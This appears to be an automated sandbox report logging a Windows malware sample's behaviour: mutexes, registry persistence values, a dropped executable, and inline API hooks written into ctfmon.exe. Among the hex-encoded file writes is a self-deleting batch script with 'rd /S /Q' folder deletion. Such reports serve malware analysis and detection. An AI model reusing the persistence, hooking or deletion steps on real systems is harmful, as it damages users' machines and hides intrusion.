Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-7658-CCC380897706} success or wait 2096859290
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1E58-CCC3E8897706} success or wait 2096860223
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\webhp[1].txt Offset: none Length: 4096 Value: 3C 21 64 6F 63 74 79 70 65 20 68 74 6D 6C 3E 3C 68 74 6D 6C 3E 3C 68 65 61 64 3E 3C 6D 65 74 61 20 68 74 74 70 2D 65 71 75 69 76 3D 22 58 2D 55 41 2D 43 6F 6D 70 61 74 69 62 6C 65 22 20 63 6F 6E 74 65 6E 74 3D 22 49 45 3D 65 64 67 65 22 3E 3C 6D 65 74 61 20 68 74 74 70 2D 65 71 75 69 76 3D 22 63 6F success or wait 2097554074
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\webhp[1].txt Offset: none Length: 4096 Value: 64 64 69 6E 67 3A 31 30 70 78 20 30 3B 70 6F 73 69 74 69 6F 6E 3A 72 65 6C 61 74 69 76 65 3B 7A 2D 69 6E 64 65 78 3A 32 3B 7A 6F 6F 6D 3A 31 7D 2E 67 62 74 7B 70 6F 73 69 74 69 6F 6E 3A 72 65 6C 61 74 69 76 65 3B 64 69 73 70 6C 61 79 3A 2D 6D 6F 7A 2D 69 6E 6C 69 6E 65 2D 62 6F 78 3B 64 69 73 70 6C success or wait 2097887029
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\webhp[1].txt Offset: none Length: 4096 Value: 65 7B 66 6F 6E 74 2D 77 65 69 67 68 74 3A 62 6F 6C 64 7D 23 67 62 6D 70 70 7B 64 69 73 70 6C 61 79 3A 6E 6F 6E 65 7D 23 67 62 64 34 20 2E 67 62 6D 63 63 7B 6D 61 72 67 69 6E 2D 74 6F 70 3A 35 70 78 7D 2E 67 62 70 6D 63 7B 62 61 63 6B 67 72 6F 75 6E 64 3A 23 65 64 66 65 65 61 7D 2E 67 62 70 6D 63 20 success or wait 2097893021
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\webhp[1].txt Offset: none Length: 4096 Value: 61 74 69 6F 6E 3A 6E 6F 6E 65 7D 23 73 73 2D 62 6F 78 20 61 3A 68 6F 76 65 72 7B 62 61 63 6B 67 72 6F 75 6E 64 3A 23 34 44 39 30 46 45 3B 63 6F 6C 6F 72 3A 23 66 66 66 21 69 6D 70 6F 72 74 61 6E 74 7D 61 2E 73 73 2D 73 65 6C 65 63 74 65 64 7B 63 6F 6C 6F 72 3A 23 32 32 32 21 69 6D 70 6F 72 74 61 6E success or wait 2097939530
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\webhp[1].txt Offset: none Length: 4096 Value: 67 72 6F 75 6E 64 2D 69 6D 61 67 65 3A 2D 6D 73 2D 6C 69 6E 65 61 72 2D 67 72 61 64 69 65 6E 74 28 74 6F 70 2C 23 64 64 34 62 33 39 2C 23 62 30 32 38 31 61 29 3B 66 69 6C 74 65 72 3A 70 72 6F 67 69 64 3A 44 58 49 6D 61 67 65 54 72 61 6E 73 66 6F 72 6D 2E 4D 69 63 72 6F 73 6F 66 74 2E 67 72 61 64 69 success or wait 2097979549
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\webhp[1].txt Offset: none Length: 4096 Value: 63 3D 61 3B 43 3D 63 2B 31 7D 2C 44 3D 5B 5D 2C 43 3D 30 3B 6E 28 22 6C 6F 67 67 65 72 22 2C 7B 69 6C 3A 42 2C 6D 6C 3A 41 7D 29 3B 76 61 72 20 46 3D 77 69 6E 64 6F 77 2E 67 62 61 72 2E 6C 6F 67 67 65 72 3B 76 61 72 20 47 3D 5F 74 76 66 28 22 30 2E 30 31 22 2C 31 2E 30 45 2D 34 29 2C 48 3D 30 3B 0A success or wait 2098020074
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\webhp[1].txt Offset: none Length: 4096 Value: 2C 69 29 3B 57 28 61 2C 22 22 29 7D 7D 2C 4B 61 3D 66 75 6E 63 74 69 6F 6E 28 61 29 7B 74 72 79 7B 55 28 29 3B 76 61 72 20 62 3D 61 7C 7C 64 6F 63 75 6D 65 6E 74 2E 67 65 74 45 6C 65 6D 65 6E 74 42 79 49 64 28 54 29 3B 69 66 28 62 29 7B 57 28 62 2C 22 54 68 69 73 20 73 65 72 76 69 63 65 20 69 73 20 success or wait 2098077499
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\webhp[1].txt Offset: none Length: 4096 Value: 61 70 70 65 6E 64 43 68 69 6C 64 28 62 2E 63 6C 6F 6E 65 4E 6F 64 65 28 74 72 75 65 29 29 7D 63 61 74 63 68 28 65 29 7B 63 28 65 29 7D 7D 3B 61 2E 61 6F 6D 63 3D 66 3B 7D 63 61 74 63 68 28 65 29 7B 77 69 6E 64 6F 77 2E 67 62 61 72 26 26 67 62 61 72 2E 6C 6F 67 67 65 72 26 26 67 62 61 72 2E 6C 6F 67 success or wait 2098086431
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\webhp[1].txt Offset: none Length: 4096 Value: 69 64 3D 67 62 5F 32 35 20 68 72 65 66 3D 22 68 74 74 70 73 3A 2F 2F 64 6F 63 73 2E 67 6F 6F 67 6C 65 2E 63 6F 6D 2F 3F 74 61 62 3D 77 6F 22 20 6F 6E 63 6C 69 63 6B 3D 22 67 62 61 72 2E 6C 6F 67 67 65 72 2E 69 6C 28 31 2C 7B 74 3A 32 35 7D 29 22 3E 44 6F 63 75 6D 65 6E 74 73 3C 2F 61 3E 3C 2F 6C 69 success or wait 2098098170
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\webhp[1].txt Offset: none Length: 4096 Value: 3E 20 3C 2F 64 69 76 3E 20 3C 2F 74 64 3E 20 3C 2F 74 72 3E 20 3C 2F 74 61 62 6C 65 3E 20 3C 2F 74 64 3E 20 3C 74 64 3E 20 20 3C 64 69 76 20 63 6C 61 73 73 3D 22 6E 6F 6A 73 76 22 20 73 74 79 6C 65 3D 22 70 6F 73 69 74 69 6F 6E 3A 72 65 6C 61 74 69 76 65 3B 68 65 69 67 68 74 3A 33 30 70 78 22 20 69 success or wait 2098172673
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\webhp[1].txt Offset: none Length: 4096 Value: 6F 67 6C 65 2E 6D 73 67 26 26 67 6F 6F 67 6C 65 2E 6D 73 67 2E 73 65 6E 64 28 36 34 29 7D 66 75 6E 63 74 69 6F 6E 20 76 28 61 29 7B 76 61 72 20 62 3D 66 61 6C 73 65 3B 74 72 79 7B 62 3D 77 69 6E 64 6F 77 2E 65 78 74 65 72 6E 61 6C 2E 69 73 47 6F 6F 67 6C 65 48 6F 6D 65 50 61 67 65 28 29 7D 63 61 74 success or wait 2098186233
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\webhp[1].txt Offset: none Length: 4096 Value: 34 41 43 77 72 4D 4B 77 42 4F 41 41 73 4B 7A 42 30 4F 41 41 73 4B 7A 41 64 4F 41 41 73 4B 7A 42 63 4F 41 41 73 4B 7A 41 59 4F 41 41 73 4B 7A 41 6D 4F 41 41 73 67 41 4A 66 6B 41 4A 62 2F 4E 65 57 39 6F 41 64 45 79 6A 45 2E 6A 73 27 29 3B 67 6F 6F 67 6C 65 2E 78 6A 73 3D 31 7D 28 66 75 6E 63 74 69 6F success or wait 2098192718
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\webhp[1].txt Offset: none Length: 2852 Value: 39 32 2C 7B 22 61 65 22 3A 74 72 75 65 2C 22 61 76 67 54 74 66 63 22 3A 32 30 30 30 2C 22 62 70 65 22 3A 66 61 6C 73 65 2C 22 62 72 62 61 22 3A 66 61 6C 73 65 2C 22 64 6C 65 6E 22 3A 32 34 2C 22 66 62 64 63 22 3A 35 30 30 2C 22 66 62 64 75 22 3A 33 30 30 30 2C 22 66 62 68 22 3A 74 72 75 65 2C 22 66 success or wait 2098279799
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: Okmaykid success or wait 2098288198
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: Okmaykid success or wait 2098288730
System info queried Type: CurrentTimeZoneInformation success or wait 2098290402
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\red[1].htm Offset: none Length: 93 Value: 28 3F DF CC 1A 3B 7B 91 90 86 C1 7C 38 88 CF A9 A5 C2 5C DF D9 49 56 15 DB 68 4C D1 02 EB EB 9C F4 35 B3 26 CF 10 3B F5 5E CD 6F 93 6B 5D 93 1D 8F 1B 26 D0 A2 79 08 73 26 79 27 D3 60 82 77 DA A3 78 7A 52 3A A7 8A A2 6F A2 9A 37 E8 99 47 A9 76 0E 45 BF AD 73 00 0F 7B 90 A5 4D E9 success or wait 2102707700
System info queried Type: ProcessInformation success or wait 2102719354
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: 2890000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2102725970
Thread created PID: 1636 TID: 772 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 2102867804
Mutant created Name: \BaseNamedObjects\Global\{C1D048FE-7063-EEA6-185B-81F8EE8A3A3D} success or wait 2102869635
Mutant created Name: \BaseNamedObjects\Global\{50BFCA5D-F2C0-7FC9-185B-81F8EE8A3A3D} success or wait 2102870069
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: Isic object name not found 2102870591
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: Isic Type: Binary Data: 9F FB 8A 01 CE CB 89 99 78 8F 7A 24 04 EC BF 69 88 AB 89 AB 82 CC B0 25 36 12 91 E9 34 A9 EB 2E 57 1B F6 70 61 B9 F3 01 0E 38 7F 2B 4F B6 85 BD 81 0A 1D 97 0A 25 5D 94 98 63 9C 40 81 BC D2 5D 0F AC 89 8E EC 10 21 E4 E9 91 3B 00 C6 6B 24 D2 success or wait 2102882638
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: Ebci buffer overflow 2102886080
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: Ebci buffer overflow 2102887554
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: Ebci success or wait 2102888079
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: Okmaykid success or wait 2102914337
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: Okmaykid success or wait 2102914881
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\red[1].htm Offset: none Length: 64 Value: 8C 75 87 84 27 E6 70 83 E6 84 3E 81 1E 7B E6 BD D9 9D EF 62 79 E9 F6 B5 7B C8 EC 71 A2 4B 4B 3C 4B 2F FD DD 66 CC 33 A9 FA 26 DE B4 F1 BE 2F 26 B5 21 1C EA 98 43 32 49 01 5E 00 F4 5A B8 4D E0 success or wait 2105448184
Thread delayed Time: 0 TID: 1906 success or wait 2105657569
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} object name not found 2107458216
File opened Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 2107460061
File opened Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 2107461901
File opened Path: C:\Documents and Settings\Administrator\Application Data\Foluv Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 2107465608
File opened Path: C:\Documents and Settings\Administrator\Application Data\Foluv Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 2107467290
File opened Path: C:\Documents and Settings\Administrator\Application Data\Qiokze Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 2107475949
File opened Path: C:\Documents and Settings\Administrator\Application Data\Qiokze Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 2107477628
File created Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat Access: read attributes and synchronize and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2107486184
File created Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat Access: read attributes and synchronize and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2107490477
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat Offset: none Length: 392 Value: 40 65 63 68 6F 20 6F 66 66 0D 0A 3A 64 0D 0A 72 64 20 2F 53 20 2F 51 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 41 64 6D 69 6E 69 73 74 72 61 74 6F 72 5C 41 70 70 6C 69 63 61 74 69 6F 6E 20 44 61 74 61 5C 46 6F 6C 75 76 22 0D 0A 72 64 20 2F 53 20 2F 51 20 22 success or wait 2107494768
Section loaded Path: C:\WINDOWS\system32\cmd.exe Access: query and write and read and execute and extend size Type: image Baseaddress: 2890000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2107497441
Section loaded Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 3430000 Size: 1208320 Protection: readonly Mapped to pid: own pid success or wait 2107499194
Section loaded Path: C:\WINDOWS\system32\cmd.exe Access: write and read and execute Type: commit Baseaddress: 2890000 Size: 389120 Protection: execute Mapped to pid: own pid success or wait 2107509845
Section loaded Path: C:\WINDOWS\system32\cmd.exe Access: query and read Type: commit Baseaddress: 2890000 Size: 389120 Protection: readonly Mapped to pid: own pid success or wait 2107512311
Section loaded Path: C:\WINDOWS\system32\cmd.exe Access: write and read and execute Type: commit Baseaddress: 2890000 Size: 389120 Protection: execute Mapped to pid: own pid success or wait 2107519907
Section loaded Path: C:\WINDOWS\system32\cmd.exe Access: query and read Type: commit Baseaddress: 2890000 Size: 389120 Protection: readonly Mapped to pid: own pid success or wait 2107522411
Section loaded Path: C:\WINDOWS\system32\cmd.exe Access: query and read Type: commit Baseaddress: 2890000 Size: 389120 Protection: readonly Mapped to pid: own pid success or wait 2107534810
Process created PID: 604 Path: C:\WINDOWS\system32\cmd.exe Cmdline: C:\WINDOWS\system32\cmd.exe /c C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat Createflags: 0 success or wait 2107537358
Analysis File: ctfmon.exe PID: 1828 Parent PID: 224
+ Sections
+ General
Start time: 06:06:44
Start date: 01/12/2011
Path: C:\WINDOWS\system32\ctfmon.exe
Commandline: C:\WINDOWS\system32\ctfmon.exe
Imagebase: 0x400000
File size: 15360 bytes
MD5 hash: 5F1D5F88303D4A4DBC8E5F97BA967CC3
File Activities:
+ File opened
File Path Access Options Content overwritten Completion Count Source Address
C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.dat read attributes and synchronize and generic read synchronous io non alert and non directory file false object name not found 1 A446EA
Section Activities:
+ Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
none query and write and read commit C20000 12288 own pid read write success or wait 1
none query and write and read commit C20000 12288 own pid read write success or wait 1
+ Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
\KnownDlls\WS2_32.dll write and read and execute unknown 2890000 389120 own pid readonly object name not found 1 A44844
C:\WINDOWS\system32\ws2_32.dll query and write and read and execute image 71AB0000 94208 own pid read write success or wait 1 A44844
\KnownDlls\WS2HELP.dll write and read and execute unknown 71AB0000 94208 own pid read write object name not found 1 A44844
C:\WINDOWS\system32\ws2help.dll query and write and read and execute image 71AA0000 32768 own pid read write success or wait 1 A44844
\KnownDlls\CRYPT32.dll write and read and execute unknown 71AA0000 32768 own pid read write object name not found 1 A44844
C:\WINDOWS\system32\crypt32.dll query and write and read and execute image 77A80000 610304 own pid read write success or wait 1 A44844
\KnownDlls\MSASN1.dll write and read and execute unknown 77A80000 610304 own pid read write object name not found 1 A44844
C:\WINDOWS\system32\msasn1.dll query and write and read and execute image 77B20000 73728 own pid read write success or wait 1 A44844
\KnownDlls\WININET.dll write and read and execute unknown 3D930000 942080 own pid read write success or wait 1 A44844
\KnownDlls\Normaliz.dll write and read and execute unknown B90000 36864 own pid read write conflicting addresses 1 A44844
\KnownDlls\urlmon.dll write and read and execute unknown 78130000 1257472 own pid read write success or wait 1 A44844
\KnownDlls\iertutil.dll write and read and execute unknown 3DFD0000 2002944 own pid read write success or wait 1 A44844
\KnownDlls\NETAPI32.dll write and read and execute unknown 3DFD0000 2002944 own pid read write object name not found 1 A44844
C:\WINDOWS\system32\netapi32.dll query and write and read and execute image 5B860000 348160 own pid read write success or wait 1 A44844
Registry Activities:
+ Key value set
Key Path Name Type Data Completion Count Source Address
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Okmaykid Binary 96 8D 31 C9 C5 75 08 F8 84 53 9B D1 F4 B9 61 28 10 B5 F1 08 71 3F 43 D6 C5 E1 62 1A C6 5B 19 DC CC D6 C6 9D C6 B3 0A 3C 08 2E 18 33 00 4D BE 0B 36 BD B7 A3 BD 92 EA 03 1F E4 1B C7 16 2B 45 CA B5 08 9E BA 6B 0D 91 DA 05 B1 6F 8F BD 44 64 5A BF 72 4F 66 A5 9E C5 70 A4 30 85 A9 DA E1 B0 C2 84 42 08 3E FA A7 EC BB C8 A3 E1 74 73 02 2C 20 4D 52 81 9C success or wait 1 A49F1A
+ Key value queried
Key Path Name Completion Count Source Address
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Enabled object name not found 1 A49EC7
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters EnabledV8 success or wait 1 A49EC7
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters CleanCookies success or wait 1 A49FC6
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters CleanCookies success or wait 1 A49EC7
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters 1406 success or wait 5 A49EC7
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters 1609 success or wait 5 A49EC7
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Okmaykid success or wait 1 A49F57
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Okmaykid success or wait 1 A49F86
Mutant Activities:
+ Mutant created
Name Completion Count Source Address
\BaseNamedObjects\Local\{5B619F6A-A7F7-7417-185B-81F8EE8A3A3D} object name exists 1 A44C09
\BaseNamedObjects\Global\{50BFCA5C-F2C1-7FC9-185B-81F8EE8A3A3D} success or wait 1 A3C0F6
\BaseNamedObjects\Local\{5B619F69-A7F4-7417-185B-81F8EE8A3A3D} object name exists 1 A44C09
Thread Activities:
+ Thread created
TID PID EIP Injected Filepath Completion Count Source Address
908 1828 7C8106F9 false C:\WINDOWS\system32\ctfmon.exe success or wait 1 A49D4C
2392 1828 7C8106F9 false C:\WINDOWS\system32\ctfmon.exe success or wait 1 A49D4C
Memory Activities:
+ Memory read
PID Filepath Base Length Value Completion Count Source Address
1828 C:\WINDOWS\system32\ctfmon.exe 7C90D1AE 30 B8 35 00 00 00 BA 00 03 FE 7F FF 12 C2 20 00 90 B8 36 00 00 00 BA 00 03 FE 7F FF 12 C2 10 success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 7C91632D 30 68 6C 02 00 00 68 80 64 91 7C E8 8F 85 FF FF A1 C8 E0 97 7C 89 45 E4 8B 45 08 89 85 B4 FD success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 7C811195 30 8B FF 55 8B EC 83 EC 64 83 7D 0C 01 56 57 0F 8D 13 AE 01 00 33 F6 39 75 0C 0F 8C 08 AE 01 success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 3D94FABE 30 8B FF 55 8B EC 51 51 53 56 33 DB 57 33 F6 33 FF 39 5D 08 89 5D FC 89 5D F8 0F 84 2A EB 03 success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 3D95EE89 30 8B FF 55 8B EC 6A 10 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 19 FD FE FF 5D success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 3D9BA6BF 30 8B FF 55 8B EC 51 51 53 33 C0 21 45 FC 21 45 F8 56 57 33 FF 33 DB 33 C9 33 D2 39 45 08 75 success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 3D9BA666 30 8B FF 55 8B EC 53 56 57 33 DB 33 C9 33 D2 33 F6 33 FF 39 5D 10 75 2C 8B 45 0C 85 C0 74 14 success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 3D949088 30 8B FF 55 8B EC 51 51 53 56 57 33 DB 33 FF F6 05 78 11 9E 3D 01 89 5D FC 0F 84 D9 6A 01 00 success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 3D94654B 30 8B FF 55 8B EC 83 EC 24 53 56 57 33 FF 39 3D B8 11 9E 3D 89 7D F4 89 7D F8 89 7D F0 C7 45 success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 3D963381 30 8B FF 55 8B EC 83 EC 20 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D FC 89 5D F4 89 5D F8 C7 45 success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 3D94BF83 30 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D FC C7 45 F8 01 00 00 00 0F success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 3D94878D 30 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D F8 89 5D FC 0F 84 C3 65 04 success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 71AB3E2B 30 8B FF 55 8B EC 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 BC 4F 00 00 E8 3A E8 FF FF 85 C0 success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 71AB4C27 30 8B FF 55 8B EC 83 EC 10 56 57 33 FF 81 3D 50 40 AC 71 29 2C AB 71 0F 84 25 6A 00 00 8D 45 success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 71AB68FA 30 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 CD 4D 00 00 8D 45 F8 50 E8 98 success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 7E41ECA3 30 B8 D7 11 00 00 BA 00 03 FE 7F FF 12 C2 0C 00 90 90 90 90 90 6A 2F 6A 01 E8 EE 97 FF FF 6A success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 7E41FE6E 30 B8 2E 12 00 00 BA 00 03 FE 7F FF 12 C2 04 00 33 FF 47 83 7D E4 FF 0F 85 AC AC FF FF C7 45 success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 7E428D20 30 6A 14 68 90 8D 42 7E E8 94 F8 FE FF E8 0B F9 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 7E42C17E 30 6A 14 68 F0 C1 42 7E E8 36 C4 FE FF E8 AD C4 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 7E423D3A 30 8B FF 55 8B EC 8B 4D 08 E8 99 47 FF FF 85 C0 74 11 6A 00 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 7E43E577 30 8B FF 55 8B EC 8B 4D 08 E8 5C 9F FD FF 85 C0 74 11 6A 01 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 7E430833 30 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 14 success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 7E44F965 30 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 D7 0E FE FF 5D C2 14 success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 7E430A47 30 8B FF 55 8B EC 6A 00 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 10 00 90 90 success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 7E44F9B4 30 8B FF 55 8B EC 6A 01 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 9C 10 FE FF 5D C2 10 00 90 90 success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 7E42A01E 30 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 89 FF FF FF 5D C2 14 success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 7E42A97D 30 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 2A F6 FF FF 5D C2 14 success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 7E41A39A 30 8B FF 55 8B EC 83 EC 30 8B 45 08 56 57 6A 09 59 8D 70 04 8B 00 8D 7D D8 F3 A5 89 45 D4 33 success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 7E42EA5E 30 8B FF 55 8B EC 83 EC 30 8B 45 08 56 57 6A 09 59 8D 70 04 8B 00 8D 7D D8 F3 A5 89 45 D4 33 success or wait 1 A4A4F3
1828 C:\WINDOWS\system32\ctfmon.exe 7E41AF7F 30 8B FF 55 8B EC 8B 45 08 83 38 30 0F 85 0B E7 02 00 68 00 01 00 00 6A 00 6A 00 50 E8 C5 F1 success or wait 1 A4A4F3
+ Memory written
PID Filepath Base Length Value Completion Count Source Address
1828 C:\WINDOWS\system32\ctfmon.exe BC0000 10 B8 35 00 00 00 E9 A9 D1 D4 7B success or wait 1 A4A569
1828 C:\WINDOWS\system32\ctfmon.exe 7C90D1AE 5 E9 33 B7 12 84 success or wait 1 A4A591
1828 C:\WINDOWS\system32\ctfmon.exe BC000A 10 68 6C 02 00 00 E9 1E 63 D5 7B success or wait 1 A4A569
1828 C:\WINDOWS\system32\ctfmon.exe 7C91632D 5 E9 94 27 12 84 success or wait 1 A4A591
1828 C:\WINDOWS\system32\ctfmon.exe BC0014 10 8B FF 55 8B EC E9 7C 11 C5 7B success or wait 1 A4A569
1828 C:\WINDOWS\system32\ctfmon.exe 7C811195 5 E9 CE 79 22 84 success or wait 1 A4A591
1828 C:\WINDOWS\system32\ctfmon.exe BC001E 10 8B FF 55 8B EC E9 9B FA D8 3C success or wait 1 A4A569
1828 C:\WINDOWS\system32\ctfmon.exe 3D94FABE 5 E9 97 45 0F C3 success or wait 1 A4A591
1828 C:\WINDOWS\system32\ctfmon.exe BC0028 10 8B FF 55 8B EC E9 5C EE D9 3C success or wait 1 A4A569
1828 C:\WINDOWS\system32\ctfmon.exe 3D95EE89 5 E9 20 52 0E C3 success or wait 1 A4A591
1828 C:\WINDOWS\system32\ctfmon.exe BC0032 10 8B FF 55 8B EC E9 88 A6 DF 3C success or wait 1 A4A569
1828 C:\WINDOWS\system32\ctfmon.exe 3D9BA6BF 5 E9 3E 9A 08 C3 success or wait 1 A4A591
1828 C:\WINDOWS\system32\ctfmon.exe BC003C 10 8B FF 55 8B EC E9 25 A6 DF 3C success or wait 1 A4A569
1828 C:\WINDOWS\system32\ctfmon.exe 3D9BA666 5 E9 33 9B 08 C3 success or wait 1 A4A591
1828 C:\WINDOWS\system32\ctfmon.exe BC0046 10 8B FF 55 8B EC E9 3D 90 D8 3C success or wait 1 A4A569
1828 C:\WINDOWS\system32\ctfmon.exe 3D949088 5 E9 AD B1 0F C3 success or wait 1 A4A591
